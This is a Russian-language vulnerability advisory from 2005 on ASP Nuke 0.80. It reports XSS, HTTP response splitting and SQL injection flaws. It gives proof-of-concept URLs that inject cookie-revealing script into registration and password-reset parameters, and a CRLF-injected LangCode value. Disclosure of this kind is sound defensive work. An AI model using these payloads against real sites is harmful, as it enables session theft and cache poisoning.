Множественные уязвимости в ASP Nuke

Дата публикации:
29.06.2005
Всего просмотров:
1527
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: ASP Nuke 0.80 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, атаку HTTP Response Splitting и выполнить произвольные SQL команды в базе данных приложения.

1. Межсайтовый скриптинг возможен из-за недостаточной обработки параметра 'email' в сценарии 'forgot_password.asp' и в нескольких параметрах сценария 'register.asp'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/module/account/register/forgot_password.asp?email=%22
%3E%3Cscript%3Ealert(document.cookie)%3 C/script%3E

http://[target]/module/account/register/register.asp?FirstName=%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register /register.asp?LastName=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Username=%22%3E%
3Cscript%3Ealert( document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?Address2=%22 %3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/module/account/register/register.asp?City=%22%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

2. Атака HTTP Response Splitting возможна из-за недостаточной обработки параметра LangCode в сценарии 'language_select.asp'. Удаленный пользователь может с помощью специально сформированного запроса подменить содержимое страниц сайта и отравить кеш промежуточных прокси серверов. Пример:

http://[target]/module/support/language/language_select.asp?action=go
& LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue

3. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре 'TaskID' сценария 'comment_post.asp'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: www.aspnuke.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in ASP Nuke 0.80

или введите имя

CAPTCHA